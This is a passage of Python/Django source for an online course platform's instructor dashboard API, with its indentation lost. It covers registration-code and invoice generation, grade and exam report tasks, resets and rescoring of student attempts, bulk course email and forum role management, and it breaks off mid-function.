@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_proctored_exam_results(request, course_id):
"""
get the proctored exam resultsreport for the particular course.
"""
query_features = [
'user_email',
'exam_name',
'attempt_code',
'allowed_time_limit_mins',
'is_sample_attempt',
'started_at',
'completed_at',
'status',
]
course_key = CourseKey.from_string(course_id)
try:
instructor_task.api.submit_proctored_exam_results_report(request, course_key, query_features)
status_response = _("The proctored exam results report is being created."
" To view the status of the report, see Pending Tasks below.")
except AlreadyRunningError:
status_response = _(
"The proctored exam results report is currently being created."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete."
)
return JsonResponse({
"status": status_response
})
def save_registration_code(user, course_id, mode_slug, invoice=None, order=None, invoice_item=None):
"""
recursive function that generate a new code every time and saves in the Course Registration Table
if validation check passes
Args:
user (User): The user creating the course registration codes.
course_id (str): The string representation of the course ID.
mode_slug (str): The Course Mode Slug associated with any enrollment made by these codes.
invoice (Invoice): (Optional) The associated invoice for this code.
order (Order): (Optional) The associated order for this code.
invoice_item (CourseRegistrationCodeInvoiceItem) : (Optional) The associated CourseRegistrationCodeInvoiceItem
Returns:
The newly created CourseRegistrationCode.
"""
code = random_code_generator()
# check if the generated code is in the Coupon Table
matching_coupons = Coupon.objects.filter(code=code, is_active=True)
if matching_coupons:
return save_registration_code(
user, course_id, mode_slug, invoice=invoice, order=order, invoice_item=invoice_item
)
course_registration = CourseRegistrationCode(
code=code,
course_id=unicode(course_id),
created_by=user,
invoice=invoice,
order=order,
mode_slug=mode_slug,
invoice_item=invoice_item
)
try:
with transaction.atomic():
course_registration.save()
return course_registration
except IntegrityError:
return save_registration_code(
user, course_id, mode_slug, invoice=invoice, order=order, invoice_item=invoice_item
)
def registration_codes_csv(file_name, codes_list, csv_type=None):
"""
Respond with the csv headers and data rows
given a dict of codes list
:param file_name:
:param codes_list:
:param csv_type:
"""
# csv headers
query_features = [
'code', 'redeem_code_url', 'course_id', 'company_name', 'created_by',
'redeemed_by', 'invoice_id', 'purchaser', 'customer_reference_number', 'internal_reference', 'is_valid'
]
registration_codes = instructor_analytics.basic.course_registration_features(query_features, codes_list, csv_type)
header, data_rows = instructor_analytics.csvs.format_dictlist(registration_codes, query_features)
return instructor_analytics.csvs.create_csv_response(file_name, header, data_rows)
def random_code_generator():
"""
generate a random alphanumeric code of length defined in
REGISTRATION_CODE_LENGTH settings
"""
code_length = getattr(settings, 'REGISTRATION_CODE_LENGTH', 8)
return generate_random_string(code_length)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_POST
def get_registration_codes(request, course_id):
"""
Respond with csv which contains a summary of all Registration Codes.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
#filter all the course registration codes
registration_codes = CourseRegistrationCode.objects.filter(
course_id=course_id
).order_by('invoice_item__invoice__company_name')
company_name = request.POST['download_company_name']
if company_name:
registration_codes = registration_codes.filter(invoice_item__invoice__company_name=company_name)
csv_type = 'download'
return registration_codes_csv("Registration_Codes.csv", registration_codes, csv_type)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_sales_admin
@require_POST
def generate_registration_codes(request, course_id):
"""
Respond with csv which contains a summary of all Generated Codes.
"""
course_id = CourseKey.from_string(course_id)
invoice_copy = False
# covert the course registration code number into integer
try:
course_code_number = int(request.POST['total_registration_codes'])
except ValueError:
course_code_number = int(float(request.POST['total_registration_codes']))
company_name = request.POST['company_name']
company_contact_name = request.POST['company_contact_name']
company_contact_email = request.POST['company_contact_email']
unit_price = request.POST['unit_price']
try:
unit_price = (
decimal.Decimal(unit_price)
).quantize(
decimal.Decimal('.01'),
rounding=decimal.ROUND_DOWN
)
except decimal.InvalidOperation:
return HttpResponse(
status=400,
content=_(u"Could not parse amount as a decimal")
)
recipient_name = request.POST['recipient_name']
recipient_email = request.POST['recipient_email']
address_line_1 = request.POST['address_line_1']
address_line_2 = request.POST['address_line_2']
address_line_3 = request.POST['address_line_3']
city = request.POST['city']
state = request.POST['state']
zip_code = request.POST['zip']
country = request.POST['country']
internal_reference = request.POST['internal_reference']
customer_reference_number = request.POST['customer_reference_number']
recipient_list = [recipient_email]
if request.POST.get('invoice', False):
recipient_list.append(request.user.email)
invoice_copy = True
sale_price = unit_price * course_code_number
set_user_preference(request.user, INVOICE_KEY, invoice_copy)
sale_invoice = Invoice.objects.create(
total_amount=sale_price,
company_name=company_name,
company_contact_email=company_contact_email,
company_contact_name=company_contact_name,
course_id=course_id,
recipient_name=recipient_name,
recipient_email=recipient_email,
address_line_1=address_line_1,
address_line_2=address_line_2,
address_line_3=address_line_3,
city=city,
state=state,
zip=zip_code,
country=country,
internal_reference=internal_reference,
customer_reference_number=customer_reference_number
)
invoice_item = CourseRegistrationCodeInvoiceItem.objects.create(
invoice=sale_invoice,
qty=course_code_number,
unit_price=unit_price,
course_id=course_id
)
course = get_course_by_id(course_id, depth=0)
paid_modes = CourseMode.paid_modes_for_course(course_id)
if len(paid_modes) != 1:
msg = (
u"Generating Code Redeem Codes for Course '{course_id}', which must have a single paid course mode. "
u"This is a configuration issue. Current course modes with payment options: {paid_modes}"
).format(course_id=course_id, paid_modes=paid_modes)
log.error(msg)
return HttpResponse(
status=500,
content=_(u"Unable to generate redeem codes because of course misconfiguration.")
)
course_mode = paid_modes[0]
course_price = course_mode.min_price
registration_codes = []
for __ in range(course_code_number):
generated_registration_code = save_registration_code(
request.user, course_id, course_mode.slug, invoice=sale_invoice, order=None, invoice_item=invoice_item
)
registration_codes.append(generated_registration_code)
site_name = microsite.get_value('SITE_NAME', 'localhost')
quantity = course_code_number
discount = (float(quantity * course_price) - float(sale_price))
course_url = '{base_url}{course_about}'.format(
base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
course_about=reverse('about_course', kwargs={'course_id': course_id.to_deprecated_string()})
)
dashboard_url = '{base_url}{dashboard}'.format(
base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
dashboard=reverse('dashboard')
)
try:
pdf_file = sale_invoice.generate_pdf_invoice(course, course_price, int(quantity), float(sale_price))
except Exception: # pylint: disable=broad-except
log.exception('Exception at creating pdf file.')
pdf_file = None
from_address = theming_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
context = {
'invoice': sale_invoice,
'site_name': site_name,
'course': course,
'course_price': course_price,
'sub_total': course_price * quantity,
'discount': discount,
'sale_price': sale_price,
'quantity': quantity,
'registration_codes': registration_codes,
'currency_symbol': settings.PAID_COURSE_REGISTRATION_CURRENCY[1],
'course_url': course_url,
'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
'dashboard_url': dashboard_url,
'contact_email': from_address,
'corp_address': microsite.get_value('invoice_corp_address', settings.INVOICE_CORP_ADDRESS),
'payment_instructions': microsite.get_value('invoice_payment_instructions', settings. INVOICE_PAYMENT_INSTRUCTIONS),
'date': time.strftime("%m/%d/%Y")
}
# composes registration codes invoice email
subject = u'Confirmation and Invoice for {course_name}'.format(course_name=course.display_name)
message = render_to_string('emails/registration_codes_sale_email.txt', context)
invoice_attachment = render_to_string('emails/registration_codes_sale_invoice_attachment.txt', context)
#send_mail(subject, message, from_address, recipient_list, fail_silently=False)
csv_file = StringIO.StringIO()
csv_writer = csv.writer(csv_file)
for registration_code in registration_codes:
full_redeem_code_url = 'http://{base_url}{redeem_code_url}'.format(
base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
redeem_code_url=reverse('register_code_redemption', kwargs={'registration_code': registration_code.code})
)
csv_writer.writerow([registration_code.code, full_redeem_code_url])
finance_email = microsite.get_value('finance_email', settings.FINANCE_EMAIL)
if finance_email:
# append the finance email into the recipient_list
recipient_list.append(finance_email)
# send a unique email for each recipient, don't put all email addresses in a single email
for recipient in recipient_list:
email = EmailMessage()
email.subject = subject
email.body = message
email.from_email = from_address
email.to = [recipient]
email.attach(u'RegistrationCodes.csv', csv_file.getvalue(), 'text/csv')
email.attach(u'Invoice.txt', invoice_attachment, 'text/plain')
if pdf_file is not None:
email.attach(u'Invoice.pdf', pdf_file.getvalue(), 'application/pdf')
else:
file_buffer = StringIO.StringIO(_('pdf download unavailable right now, please contact support.'))
email.attach(u'pdf_unavailable.txt', file_buffer.getvalue(), 'text/plain')
email.send()
return registration_codes_csv("Registration_Codes.csv", registration_codes)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_POST
def active_registration_codes(request, course_id):
"""
Respond with csv which contains a summary of all Active Registration Codes.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
# find all the registration codes in this course
registration_codes_list = CourseRegistrationCode.objects.filter(
course_id=course_id
).order_by('invoice_item__invoice__company_name')
company_name = request.POST['active_company_name']
if company_name:
registration_codes_list = registration_codes_list.filter(invoice_item__invoice__company_name=company_name)
# find the redeemed registration codes if any exist in the db
code_redemption_set = RegistrationCodeRedemption.objects.select_related(
'registration_code', 'registration_code__invoice_item__invoice'
).filter(registration_code__course_id=course_id)
if code_redemption_set.exists():
redeemed_registration_codes = [code.registration_code.code for code in code_redemption_set]
# exclude the redeemed registration codes from the registration codes list and you will get
# all the registration codes that are active
registration_codes_list = registration_codes_list.exclude(code__in=redeemed_registration_codes)
return registration_codes_csv("Active_Registration_Codes.csv", registration_codes_list)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_POST
def spent_registration_codes(request, course_id):
"""
Respond with csv which contains a summary of all Spent(used) Registration Codes.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
# find the redeemed registration codes if any exist in the db
code_redemption_set = RegistrationCodeRedemption.objects.select_related('registration_code').filter(
registration_code__course_id=course_id
)
spent_codes_list = []
if code_redemption_set.exists():
redeemed_registration_codes = [code.registration_code.code for code in code_redemption_set]
# filter the Registration Codes by course id and the redeemed codes and
# you will get a list of all the spent(Redeemed) Registration Codes
spent_codes_list = CourseRegistrationCode.objects.filter(
course_id=course_id, code__in=redeemed_registration_codes
).order_by('invoice_item__invoice__company_name').select_related('invoice_item__invoice')
company_name = request.POST['spent_company_name']
if company_name:
spent_codes_list = spent_codes_list.filter(invoice_item__invoice__company_name=company_name) # pylint: disable=maybe-no-member
csv_type = 'spent'
return registration_codes_csv("Spent_Registration_Codes.csv", spent_codes_list, csv_type)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_anon_ids(request, course_id): # pylint: disable=unused-argument
"""
Respond with 2-column CSV output of user-id, anonymized-user-id
"""
# TODO: the User.objects query and CSV generation here could be
# centralized into instructor_analytics. Currently instructor_analytics
# has similar functionality but not quite what's needed.
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
def csv_response(filename, header, rows):
"""Returns a CSV http response for the given header and rows (excel/utf-8)."""
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename={0}'.format(unicode(filename).encode('utf-8'))
writer = csv.writer(response, dialect='excel', quotechar='"', quoting=csv.QUOTE_ALL)
# In practice, there should not be non-ascii data in this query,
# but trying to do the right thing anyway.
encoded = [unicode(s).encode('utf-8') for s in header]
writer.writerow(encoded)
for row in rows:
encoded = [unicode(s).encode('utf-8') for s in row]
writer.writerow(encoded)
return response
students = User.objects.filter(
courseenrollment__course_id=course_id,
).order_by('id')
header = ['User ID', 'Anonymized User ID', 'Course Specific Anonymized User ID']
rows = [[s.id, unique_id_for_user(s, save=False), anonymous_id_for_user(s, course_id, save=False)] for s in students]
return csv_response(course_id.to_deprecated_string().replace('/', '-') + '-anon-ids.csv', header, rows)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@common_exceptions_400
@require_level('staff')
@require_query_params(
unique_student_identifier="email or username of student for whom to get progress url"
)
def get_student_progress_url(request, course_id):
"""
Get the progress url of a student.
Limited to staff access.
Takes query paremeter unique_student_identifier and if the student exists
returns e.g. {
'progress_url': '/../...'
}
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
user = get_student_from_identifier(request.GET.get('unique_student_identifier'))
progress_url = reverse('student_progress', kwargs={'course_id': course_id.to_deprecated_string(), 'student_id': user.id})
response_payload = {
'course_id': course_id.to_deprecated_string(),
'progress_url': progress_url,
}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_query_params(
problem_to_reset="problem urlname to reset"
)
@common_exceptions_400
def reset_student_attempts(request, course_id):
"""
Resets a students attempts counter or starts a task to reset all students
attempts counters. Optionally deletes student state for a problem. Limited
to staff access. Some sub-methods limited to instructor access.
Takes some of the following query paremeters
- problem_to_reset is a urlname of a problem
- unique_student_identifier is an email or username
- all_students is a boolean
requires instructor access
mutually exclusive with delete_module
mutually exclusive with delete_module
- delete_module is a boolean
requires instructor access
mutually exclusive with all_students
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_with_access(
request.user, 'staff', course_id, depth=None
)
problem_to_reset = strip_if_string(request.GET.get('problem_to_reset'))
student_identifier = request.GET.get('unique_student_identifier', None)
student = None
if student_identifier is not None:
student = get_student_from_identifier(student_identifier)
all_students = request.GET.get('all_students', False) in ['true', 'True', True]
delete_module = request.GET.get('delete_module', False) in ['true', 'True', True]
# parameter combinations
if all_students and student:
return HttpResponseBadRequest(
"all_students and unique_student_identifier are mutually exclusive."
)
if all_students and delete_module:
return HttpResponseBadRequest(
"all_students and delete_module are mutually exclusive."
)
# instructor authorization
if all_students or delete_module:
if not has_access(request.user, 'instructor', course):
return HttpResponseForbidden("Requires instructor access.")
try:
module_state_key = course_id.make_usage_key_from_deprecated_string(problem_to_reset)
except InvalidKeyError:
return HttpResponseBadRequest()
response_payload = {}
response_payload['problem_to_reset'] = problem_to_reset
if student:
try:
enrollment.reset_student_attempts(
course_id,
student,
module_state_key,
requesting_user=request.user,
delete_module=delete_module
)
except StudentModule.DoesNotExist:
return HttpResponseBadRequest(_("Module does not exist."))
except sub_api.SubmissionError:
# Trust the submissions API to log the error
error_msg = _("An error occurred while deleting the score.")
return HttpResponse(error_msg, status=500)
response_payload['student'] = student_identifier
elif all_students:
instructor_task.api.submit_reset_problem_attempts_for_all_students(request, module_state_key)
response_payload['task'] = 'created'
response_payload['student'] = 'All Students'
else:
return HttpResponseBadRequest()
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@common_exceptions_400
def reset_student_attempts_for_entrance_exam(request, course_id): # pylint: disable=invalid-name
"""
Resets a students attempts counter or starts a task to reset all students
attempts counters for entrance exam. Optionally deletes student state for
entrance exam. Limited to staff access. Some sub-methods limited to instructor access.
Following are possible query parameters
- unique_student_identifier is an email or username
- all_students is a boolean
requires instructor access
mutually exclusive with delete_module
- delete_module is a boolean
requires instructor access
mutually exclusive with all_students
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_with_access(
request.user, 'staff', course_id, depth=None
)
if not course.entrance_exam_id:
return HttpResponseBadRequest(
_("Course has no entrance exam section.")
)
student_identifier = request.GET.get('unique_student_identifier', None)
student = None
if student_identifier is not None:
student = get_student_from_identifier(student_identifier)
all_students = request.GET.get('all_students', False) in ['true', 'True', True]
delete_module = request.GET.get('delete_module', False) in ['true', 'True', True]
# parameter combinations
if all_students and student:
return HttpResponseBadRequest(
_("all_students and unique_student_identifier are mutually exclusive.")
)
if all_students and delete_module:
return HttpResponseBadRequest(
_("all_students and delete_module are mutually exclusive.")
)
# instructor authorization
if all_students or delete_module:
if not has_access(request.user, 'instructor', course):
return HttpResponseForbidden(_("Requires instructor access."))
try:
entrance_exam_key = course_id.make_usage_key_from_deprecated_string(course.entrance_exam_id)
if delete_module:
instructor_task.api.submit_delete_entrance_exam_state_for_student(request, entrance_exam_key, student)
else:
instructor_task.api.submit_reset_problem_attempts_in_entrance_exam(request, entrance_exam_key, student)
except InvalidKeyError:
return HttpResponseBadRequest(_("Course has no valid entrance exam section."))
response_payload = {'student': student_identifier or _('All Students'), 'task': 'created'}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@require_query_params(problem_to_reset="problem urlname to reset")
@common_exceptions_400
def rescore_problem(request, course_id):
"""
Starts a background process a students attempts counter. Optionally deletes student state for a problem.
Limited to instructor access.
Takes either of the following query paremeters
- problem_to_reset is a urlname of a problem
- unique_student_identifier is an email or username
- all_students is a boolean
all_students and unique_student_identifier cannot both be present.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
problem_to_reset = strip_if_string(request.GET.get('problem_to_reset'))
student_identifier = request.GET.get('unique_student_identifier', None)
student = None
if student_identifier is not None:
student = get_student_from_identifier(student_identifier)
all_students = request.GET.get('all_students') in ['true', 'True', True]
if not (problem_to_reset and (all_students or student)):
return HttpResponseBadRequest("Missing query parameters.")
if all_students and student:
return HttpResponseBadRequest(
"Cannot rescore with all_students and unique_student_identifier."
)
try:
module_state_key = course_id.make_usage_key_from_deprecated_string(problem_to_reset)
except InvalidKeyError:
return HttpResponseBadRequest("Unable to parse problem id")
response_payload = {}
response_payload['problem_to_reset'] = problem_to_reset
if student:
response_payload['student'] = student_identifier
instructor_task.api.submit_rescore_problem_for_student(request, module_state_key, student)
response_payload['task'] = 'created'
elif all_students:
instructor_task.api.submit_rescore_problem_for_all_students(request, module_state_key)
response_payload['task'] = 'created'
else:
return HttpResponseBadRequest()
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@common_exceptions_400
def rescore_entrance_exam(request, course_id):
"""
Starts a background process a students attempts counter for entrance exam.
Optionally deletes student state for a problem. Limited to instructor access.
Takes either of the following query parameters
- unique_student_identifier is an email or username
- all_students is a boolean
all_students and unique_student_identifier cannot both be present.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_with_access(
request.user, 'staff', course_id, depth=None
)
student_identifier = request.GET.get('unique_student_identifier', None)
student = None
if student_identifier is not None:
student = get_student_from_identifier(student_identifier)
all_students = request.GET.get('all_students') in ['true', 'True', True]
if not course.entrance_exam_id:
return HttpResponseBadRequest(
_("Course has no entrance exam section.")
)
if all_students and student:
return HttpResponseBadRequest(
_("Cannot rescore with all_students and unique_student_identifier.")
)
try:
entrance_exam_key = course_id.make_usage_key_from_deprecated_string(course.entrance_exam_id)
except InvalidKeyError:
return HttpResponseBadRequest(_("Course has no valid entrance exam section."))
response_payload = {}
if student:
response_payload['student'] = student_identifier
else:
response_payload['student'] = _("All Students")
instructor_task.api.submit_rescore_entrance_exam_for_student(request, entrance_exam_key, student)
response_payload['task'] = 'created'
return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_background_email_tasks(request, course_id): # pylint: disable=unused-argument
"""
List background email tasks.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
task_type = 'bulk_course_email'
# Specifying for the history of a single task type
tasks = instructor_task.api.get_instructor_task_history(course_id, task_type=task_type)
response_payload = {
'tasks': map(extract_task_features, tasks),
}
return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_email_content(request, course_id): # pylint: disable=unused-argument
"""
List the content of bulk emails sent
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
task_type = 'bulk_course_email'
# First get tasks list of bulk emails sent
emails = instructor_task.api.get_instructor_task_history(course_id, task_type=task_type)
response_payload = {
'emails': map(extract_email_features, emails),
}
return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_instructor_tasks(request, course_id):
"""
List instructor tasks.
Takes optional query paremeters.
- With no arguments, lists running tasks.
- `problem_location_str` lists task history for problem
- `problem_location_str` and `unique_student_identifier` lists task
history for problem AND student (intersection)
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
problem_location_str = strip_if_string(request.GET.get('problem_location_str', False))
student = request.GET.get('unique_student_identifier', None)
if student is not None:
student = get_student_from_identifier(student)
if student and not problem_location_str:
return HttpResponseBadRequest(
"unique_student_identifier must accompany problem_location_str"
)
if problem_location_str:
try:
module_state_key = course_id.make_usage_key_from_deprecated_string(problem_location_str)
except InvalidKeyError:
return HttpResponseBadRequest()
if student:
# Specifying for a single student's history on this problem
tasks = instructor_task.api.get_instructor_task_history(course_id, module_state_key, student)
else:
# Specifying for single problem's history
tasks = instructor_task.api.get_instructor_task_history(course_id, module_state_key)
else:
# If no problem or student, just get currently running tasks
tasks = instructor_task.api.get_running_instructor_tasks(course_id)
response_payload = {
'tasks': map(extract_task_features, tasks),
}
return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_entrance_exam_instructor_tasks(request, course_id): # pylint: disable=invalid-name
"""
List entrance exam related instructor tasks.
Takes either of the following query parameters
- unique_student_identifier is an email or username
- all_students is a boolean
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_by_id(course_id)
student = request.GET.get('unique_student_identifier', None)
if student is not None:
student = get_student_from_identifier(student)
try:
entrance_exam_key = course_id.make_usage_key_from_deprecated_string(course.entrance_exam_id)
except InvalidKeyError:
return HttpResponseBadRequest(_("Course has no valid entrance exam section."))
if student:
# Specifying for a single student's entrance exam history
tasks = instructor_task.api.get_entrance_exam_instructor_task_history(course_id, entrance_exam_key, student)
else:
# Specifying for all student's entrance exam history
tasks = instructor_task.api.get_entrance_exam_instructor_task_history(course_id, entrance_exam_key)
response_payload = {
'tasks': map(extract_task_features, tasks),
}
return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_report_downloads(_request, course_id):
"""
List grade CSV files that are available for download for this course.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
report_store = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
response_payload = {
'downloads': [
dict(name=name, url=url, link=HTML('<a href="{}">{}</a>').format(HTML(url), Text(name)))
for name, url in report_store.links_for(course_id)
]
}
return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_finance_admin
def list_financial_report_downloads(_request, course_id):
"""
List grade CSV files that are available for download for this course.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
report_store = ReportStore.from_config(config_name='FINANCIAL_REPORTS')
response_payload = {
'downloads': [
dict(name=name, url=url, link=HTML('<a href="{}">{}</a>').format(HTML(url), Text(name)))
for name, url in report_store.links_for(course_id)
]
}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def export_ora2_data(request, course_id):
"""
Pushes a Celery task which will aggregate ora2 responses for a course into a .csv
"""
course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
try:
instructor_task.api.submit_export_ora2_data(request, course_key)
success_status = _("The ORA data report is being generated.")
return JsonResponse({"status": success_status})
except AlreadyRunningError:
already_running_status = _(
"An ORA data report generation task is already in "
"progress. Check the 'Pending Tasks' table "
"for the status of the task. When completed, the report "
"will be available for download in the table below."
)
return JsonResponse({"status": already_running_status})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def calculate_grades_csv(request, course_id):
"""
AlreadyRunningError is raised if the course's grades are already being updated.
"""
course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
try:
instructor_task.api.submit_calculate_grades_csv(request, course_key)
success_status = _("The grade report is being created."
" To view the status of the report, see Pending Tasks below.")
return JsonResponse({"status": success_status})
except AlreadyRunningError:
already_running_status = _("The grade report is currently being created."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete.")
return JsonResponse({"status": already_running_status})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def problem_grade_report(request, course_id):
"""
Request a CSV showing students' grades for all problems in the
course.
AlreadyRunningError is raised if the course's grades are already being
updated.
"""
course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
try:
instructor_task.api.submit_problem_grade_report(request, course_key)
success_status = _("The problem grade report is being created."
" To view the status of the report, see Pending Tasks below.")
return JsonResponse({"status": success_status})
except AlreadyRunningError:
already_running_status = _("A problem grade report is already being generated."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete.")
return JsonResponse({
"status": already_running_status
})
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_query_params('rolename')
def list_forum_members(request, course_id):
"""
Lists forum members of a certain rolename.
Limited to staff access.
The requesting user must be at least staff.
Staff forum admins can access all roles EXCEPT for FORUM_ROLE_ADMINISTRATOR
which is limited to instructors.
Takes query parameter `rolename`.
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_by_id(course_id)
has_instructor_access = has_access(request.user, 'instructor', course)
has_forum_admin = has_forum_access(
request.user, course_id, FORUM_ROLE_ADMINISTRATOR
)
rolename = request.GET.get('rolename')
# default roles require either (staff & forum admin) or (instructor)
if not (has_forum_admin or has_instructor_access):
return HttpResponseBadRequest(
"Operation requires staff & forum admin or instructor access"
)
# EXCEPT FORUM_ROLE_ADMINISTRATOR requires (instructor)
if rolename == FORUM_ROLE_ADMINISTRATOR and not has_instructor_access:
return HttpResponseBadRequest("Operation requires instructor access.")
# filter out unsupported for roles
if rolename not in [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]:
return HttpResponseBadRequest(strip_tags(
"Unrecognized rolename '{}'.".format(rolename)
))
try:
role = Role.objects.get(name=rolename, course_id=course_id)
users = role.users.all().order_by('username')
except Role.DoesNotExist:
users = []
def extract_user_info(user):
""" Convert user to dict for json rendering. """
return {
'username': user.username,
'email': user.email,
'first_name': user.first_name,
'last_name': user.last_name,
}
response_payload = {
'course_id': course_id.to_deprecated_string(),
rolename: map(extract_user_info, users),
}
return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params(send_to="sending to whom", subject="subject line", message="message text")
def send_email(request, course_id):
"""
Send an email to self, staff, or everyone involved in a course.
Query Parameters:
- 'send_to' specifies what group the email should be sent to
Options are defined by the CourseEmail model in
lms/djangoapps/bulk_email/models.py
- 'subject' specifies email's subject
- 'message' specifies email's content
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
if not BulkEmailFlag.feature_enabled(course_id):
return HttpResponseForbidden("Email is not enabled for this course.")
targets = json.loads(request.POST.get("send_to"))
subject = request.POST.get("subject")
message = request.POST.get("message")
# allow two branding points to come from Microsites: which CourseEmailTemplate should be used
# and what the 'from' field in the email should be
#
# If these are None (because we are not in a Microsite or they are undefined in Microsite config) than
# the system will use normal system defaults
template_name = microsite.get_value('course_email_template_name')
from_addr = microsite.get_value('course_email_from_addr')
# Create the CourseEmail object. This is saved immediately, so that
# any transaction that has been pending up to this point will also be
# committed.
try:
email = CourseEmail.create(
course_id,
request.user,
targets,
subject, message,
template_name=template_name,
from_addr=from_addr
)
except ValueError as err:
return HttpResponseBadRequest(repr(err))
# Submit the task, so that the correct InstructorTask object gets created (for monitoring purposes)
instructor_task.api.submit_bulk_course_email(request, course_id, email.id)
response_payload = {
'course_id': course_id.to_deprecated_string(),
'success': True,
}
return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_query_params(
unique_student_identifier="email or username of user to change access",
rolename="the forum role",
action="'allow' or 'revoke'",
)
@common_exceptions_400
def update_forum_role_membership(request, course_id):
"""
Modify user's forum role.
The requesting user must be at least staff.
Staff forum admins can access all roles EXCEPT for FORUM_ROLE_ADMINISTRATOR
which is limited to instructors.
No one can revoke an instructors FORUM_ROLE_ADMINISTRATOR status.
Query parameters:
- `email` is the target users email
- `rolename` is one of [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]
- `action` is one of ['allow', 'revoke']
"""
course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
course = get_course_by_id(course_id)
has_instructor_access = has_access(request.user, 'instructor', course)
has_forum_admin = has_forum_access(
request.user, course_id, FORUM_ROLE_ADMINISTRATOR
)
unique_student_identifier = request.GET.get('unique_student_identifier')
rolename = request.GET.get('rolename')
action = request.GET.get('action')
# default roles require either (staff & forum admin) or (instructor)
if not (has_forum_admin or has_instructor_access):
return HttpResponseBadRequest(
"Operation requires staff & forum admin or instructor access"
)
# EXCEPT FORUM_ROLE_ADMINISTRATOR requires (instructor)
if rolename == FORUM_ROLE_ADMINISTRATOR and not has_instructor_access:
return HttpResponseBadRequest("Operation requires instructor access.")
if rolename not in [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]:
return HttpResponseBadRequest(strip_tags(
"Unrecognized rolename '{}'.".format(rolename)
))
user = get_student_from_identifier(unique_student_identifier)
try:
